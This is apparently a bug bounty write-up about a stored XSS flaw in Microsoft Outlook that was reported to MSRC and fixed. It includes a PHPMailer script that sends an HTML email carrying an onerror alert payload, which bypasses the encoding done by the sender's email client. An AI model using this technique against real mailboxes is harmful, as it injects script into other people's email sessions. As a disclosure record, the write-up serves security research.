Staying home is really nightmare for me and I am so boring to learn new things. So, I decided to write a writeup about how I found stored XSS in Micorsoft outook and got some bounty $3000.
I stopped hunting bugs since last 3 years ago after I got some bounty from Yahoo, Tumblr ..etc. Last few months ago, my old tested payload from shopify pop-up in my Microsoft outlook email. So I started to dig around, I sent every XSS payload including polyglots to my Microsoft account but nothing seems showing an alert. After hours of struggling, I reported to MSRC with below message, lol. I though I am idiot.
And as expected, MSRC reply need more info. I know there is XSS bug in Microsoft outlook and I just didn’t found the endpoint. After thinking some hours, I started thinking about what if sending email client validate and encode my payload?. If my payload is standardized from sender side, there won’t be no vuln point in receiver side which is Microsoft outlook. So I decided to write a simple php script in order send my message to outlook.
The script that I used to send XSS payload to outlook is below.
<?php
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;
require ‘vendor/autoload.php’;
$mail = new PHPMailer(true);
try {
//Server settings
$mail->SMTPDebug = 2;
$mail->isSMTP();
$mail->Host = ‘smtp.gmail.com’;
$mail->SMTPAuth = true;
$mail->Username = ‘mymail@gmail.com’;
$mail->Password = ‘mypassword’;
$mail->SMTPSecure = ‘tls’;
$mail->Port = 587;
//Recipients
$mail->setFrom(‘mymail@gmail.com’, ‘kmt’);
$mail->addAddress(‘receiver@outlook.com’, ‘’);
//Content
$mail->isHTML(true);
$mail->Subject = ‘XSS POC’;
$mail -> Body = “<img src=x onerror=alert(1)>”;
$mail->send();
echo ‘Message has been sent’;
} catch (Exception $e) {
echo ‘Message could not be sent. Mailer Error: ‘, $mail->ErrorInfo;
}
?>
After firing the script and watch my outlook mail box. Boom, XSS and seems office365 is also affected.
You can view PoC video from here.
After fixing the bug I was awarded $3000 from MSRC.
Conclusion
In above scenario, I strongly believe my sender email client encode my payload before sending to outlook there is no more XSS in outlook. So I choose to write simple PHP script with PHP mailer.
